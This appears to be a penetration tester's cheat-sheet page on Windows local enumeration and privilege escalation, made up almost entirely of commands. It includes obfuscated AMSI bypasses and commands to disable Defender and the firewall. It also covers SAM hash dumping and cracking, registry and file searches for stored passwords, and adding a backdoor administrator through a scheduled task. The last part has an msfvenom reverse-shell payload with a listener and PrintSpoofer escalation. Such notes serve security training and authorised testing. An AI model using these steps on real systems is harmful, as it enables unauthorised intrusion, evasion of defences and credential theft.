930 words

5 minutes

Windows Local Escalation and Enumeration

2025-02-08

Notes

/

AD

/

windows

Local Escalation and Enumeration#

Local User & Group Enumeration#

In Ps :

1
$env:username
2
whoami /priv
3
whoami /groups
4
net user
5
whoami /all
6
Get-LocalUser | ft Name, Enabled, LastLogon
7
Get-ChildItem C:\Users -Force | select Name
8
net accounts
9
net user administrator
10
net localgroup
11
Get-LocalGroup | ft Name
12
net localgroup administrators
13
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
14
Get-LocalGroupMember Administrators

In CMD :

1
echo %USERNAME% || whoami
2
whoami /priv
3
whoami /groups
4
net user
5
whoami /all
6
net accounts
7
net user administrator
8
net localgroup
9
net localgroup administrators

Network Enumeration#

1
# List all network interfaces, IP, and DNS.
2
ipconfig /all
3
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
4
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
5
# List current routing table
6
route print
7
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
8
# List the ARP table
9
arp -A
10
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
11
# List all current connections
12
netstat -ano
13
# List firewall state and current configuration
14
netsh advfirewall firewall dump
15
netsh firewall show state
16
netsh firewall show config
17
# List firewall's blocked ports
18
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
19
# Disable firewall
20
netsh firewall set opmode disable
21
netsh advfirewall set allprofiles state off
22
# List all network shares
23
net share
24
SNMP Configuration
25
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
26
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

Antivirus & Detections#

Windows Defender#

1
# check status of Defender
2
PS C:\> Get-MpComputerStatus
3

4
# disable Real Time Monitoring
5
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
6
PS C:\> Set-MpPreference -DisableIOAVProtection $true

Firewall#

1
netsh advfirewall show domain
2
netsh advfirewall show private
3
netsh advfirewall show public

AppLocker Enumeration#

With the GPO
HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).

1
# List AppLocker rules
2
PS C:\> $a = Get-ApplockerPolicy -effective
3
PS C:\> $a.rulecollections

Powershell#

1
# Default powershell locations in a Windows system.
2
C:\windows\syswow64\windowspowershell\v1.0\powershell
3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
4
# Example of AMSI Bypass.
5
PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)

Default Writeable Folders#

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing

Hunting Passwords#

SAM and SYSTEM files#

The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.

1
%SYSTEMROOT%\repair\SAM
2
%SYSTEMROOT%\System32\config\RegBack\SAM
3
%SYSTEMROOT%\System32\config\SAM
4
%SYSTEMROOT%\repair\system
5
%SYSTEMROOT%\System32\config\SYSTEM
6
%SYSTEMROOT%\System32\config\RegBack\system

Generate a hash file for John using pwdump or samdump2.

1
pwdump SYSTEM SAM > /root/sam.txt
2
samdump2 SYSTEM SAM -o sam.txt

Then crack it with john -format=NT /root/sam.txt.

Search for file contents#

1
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
2
findstr /si password *.xml *.ini *.txt *.config
3
findstr /spin "password" *.*

Search for a file with a certain filename#

1
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
2
# cmd
3
where /R C:\ user.txt
4
where /R C:\ *.ini

Search the registry for key names and passwords#

1
REG QUERY HKLM /F "password" /t REG_SZ /S /K
2
REG QUERY HKCU /F "password" /t REG_SZ /S /K
3

4
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
5
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
6
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
7
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
8
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
9
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
10

11
reg query HKLM /f password /t REG_SZ /s
12
reg query HKCU /f password /t REG_SZ /s

Read a value of a certain sub key#

1
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList

Passwords in unattend.xml#

Location of the unattend.xml files.

1
C:\unattend.xml
2
C:\Windows\Panther\Unattend.xml
3
C:\Windows\Panther\Unattend\Unattend.xml
4
C:\Windows\system32\sysprep.inf
5
C:\Windows\system32\sysprep\sysprep.xml

Display the content of these files with dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Example content

1
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
2
    <AutoLogon>
3
     <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
4
     <Enabled>true</Enabled>
5
     <Username>Administrateur</Username>
6
    </AutoLogon>
7

8
    <UserAccounts>
9
     <LocalAccounts>
10
      <LocalAccount wcm:action="add">
11
       <Password>*SENSITIVE*DATA*DELETED*</Password>
12
       <Group>administrators;users</Group>
13
       <Name>Administrateur</Name>
14
      </LocalAccount>
15
     </LocalAccounts>
16
    </UserAccounts>

Unattend credentials are stored in base64 and can be decoded manually with base64.

1
$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo="  | base64 -d
2
SecretSecurePassword1234*

The Metasploit module post/windows/gather/enum_unattend looks for these files.

IIS Web config#

1
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
3
C:\inetpub\wwwroot\web.config

Other files#

1
%SYSTEMDRIVE%\pagefile.sys
2
%WINDIR%\debug\NetSetup.log
3
%WINDIR%\repair\sam
4
%WINDIR%\repair\system
5
%WINDIR%\repair\software, %WINDIR%\repair\security
6
%WINDIR%\iis6.log
7
%WINDIR%\system32\config\AppEvent.Evt
8
%WINDIR%\system32\config\SecEvent.Evt
9
%WINDIR%\system32\config\default.sav
10
%WINDIR%\system32\config\security.sav
11
%WINDIR%\system32\config\software.sav
12
%WINDIR%\system32\config\system.sav
13
%WINDIR%\system32\CCM\logs\*.log
14
%USERPROFILE%\ntuser.dat
15
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
16
%WINDIR%\System32\drivers\etc\hosts
17
C:\ProgramData\Configs\*
18
C:\Program Files\Windows PowerShell\*
19
dir c:*vnc.ini /s /b
20
dir c:*ultravnc.ini /s /b

PrivEsc Tools#

PowerUp
- import-module .\PowerUp.ps1
- Invoke-AllChecks
Jaws
- import-module .\jaws-enum.ps1
WinPeas
- winpeas.bat
Watson
- watson.exe
CVE-2019-1388

1
# Run from CMD:
2
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
3

4
# Bypassing the PowerShell Execution Policy
5
powershell -ep bypass
6

7
# AMSI stands for Anti-Malware Scan Interface and was introduced in Windows 10.AMSI provides increased protection against the usage of some modern Tools,
8
SET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Windows Version and Configuration#

After getting All the Information u need, u can search for exploits

1
systeminfo
2
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Extract patchs and updates#

1
wmic qfe

Architecture#

1
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

List all env variables#

1
set
2
Get-ChildItem Env: | ft Key,Value

List all drives#

1
wmic logicaldisk get caption || fsutil fsinfo drives
2
wmic logicaldisk get caption,description,providername
3
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

Schedule Task Privilege Escalation#

1
# Run from CMD:
2
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
3

4
# Manually Search
5
schtasks /query /fo LIST 2>nul | findstr TaskName
6
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
7
schtasks /query /fo LIST /v > C:\Users\student1\Desktop\task.txt
8

9
# Edit the file executed by Administrator
10
net user /add rabakuku Password123
11
net localgroup administrators rabakuku /add
12

13
# reboot
14
shutdown /r /f

Unquoted service path#

1
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
2

3
# From Kali or ParrotOS
4
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.55 LPORT=1234 -f exe > abyss.exe
5

6
# Run a web server
7
Python -m SimpleHTTPServer

powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts.

1
Import-module .\powercat.ps1
2
Powercat -l -p 1234 -Verbose
3

4
net localgroup administrators student1 /add

SEImpersonate#

Download Print Spoofer https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

1
# Run Print Spoofer
2
PrintSpoofer.exe -d 1 -c cmd
3

4
# Disable Firewal and AV
5
Set-MpPreference -DisableRealtimeMonitoring $true
6
Set-MpPreference -DisableIOAVProtection $true
7
netsh advfirewall set allprofiles state off